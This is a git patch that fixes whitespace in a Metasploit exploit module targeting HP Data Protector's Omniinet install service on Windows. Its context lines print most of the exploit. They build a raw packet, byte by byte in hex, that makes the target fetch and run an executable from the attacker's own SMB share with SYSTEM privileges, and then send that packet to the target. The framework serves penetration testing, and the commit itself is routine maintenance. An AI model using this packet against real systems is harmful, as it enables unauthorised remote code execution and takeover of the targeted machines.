From c5773b1a02fa8137b3504de550a3a8cd307083d5 Mon Sep 17 00:00:00 2001 From: benpturner Date: Tue, 12 Jan 2016 17:04:50 +0000 Subject: [PATCH] Removal of spaces found with msftidy --- .../misc/hp_dataprotector_install_service.rb | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb index fb31510ab6..c5ee140c73 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb @@ -16,8 +16,8 @@ class Metasploit4 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP Data Protector 6.10/6.11/6.20 Install Service', 'Description' => %q{ - This module exploits HP Data Protector Omniinet process on Windows only. - This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable. + This module exploits HP Data Protector Omniinet process on Windows only. + This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable. To ensure this works, the SMB server created in MSF must have a share called Omniback which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\ }, 'Author' => [ @@ -59,9 +59,9 @@ class Metasploit4 < Msf::Exploit::Remote deregister_options('FILE_NAME') end - def peer - "#{rhost}:#{rport}" - end + def peer + "#{rhost}:#{rport}" + end def check fingerprint = get_fingerprint @@ -113,14 +113,14 @@ class Metasploit4 < Msf::Exploit::Remote end shellcode = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20" - shellcode << lhostfull + shellcode << lhostfull shellcode << "\x00\x00\x00\x20\x00\x30\x00" shellcode << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00" shellcode << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00" shellcode << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00" shellcode << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00" shellcode << "\x5c" - shellcode << lhostfull + shellcode << lhostfull shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00" shellcode << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00" shellcode << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00" @@ -128,7 +128,7 @@ class Metasploit4 < Msf::Exploit::Remote shellcode << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00" shellcode << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62" shellcode << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c" - shellcode << lhostfull + shellcode << lhostfull shellcode << "\x5c\x00\x5c\x00\x4f\x00" shellcode << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00" shellcode << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00" @@ -136,20 +136,20 @@ class Metasploit4 < Msf::Exploit::Remote shellcode << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00" shellcode << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00" shellcode << "\x5c\x00\x5c" - shellcode << lhostfull + shellcode << lhostfull shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63" shellcode << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54" shellcode << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00" shellcode << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00" shellcode << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c" - shellcode << lhostfull + shellcode << lhostfull shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63" shellcode << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00" connect() sock.put(shellcode) disconnect - end + end def exploit begin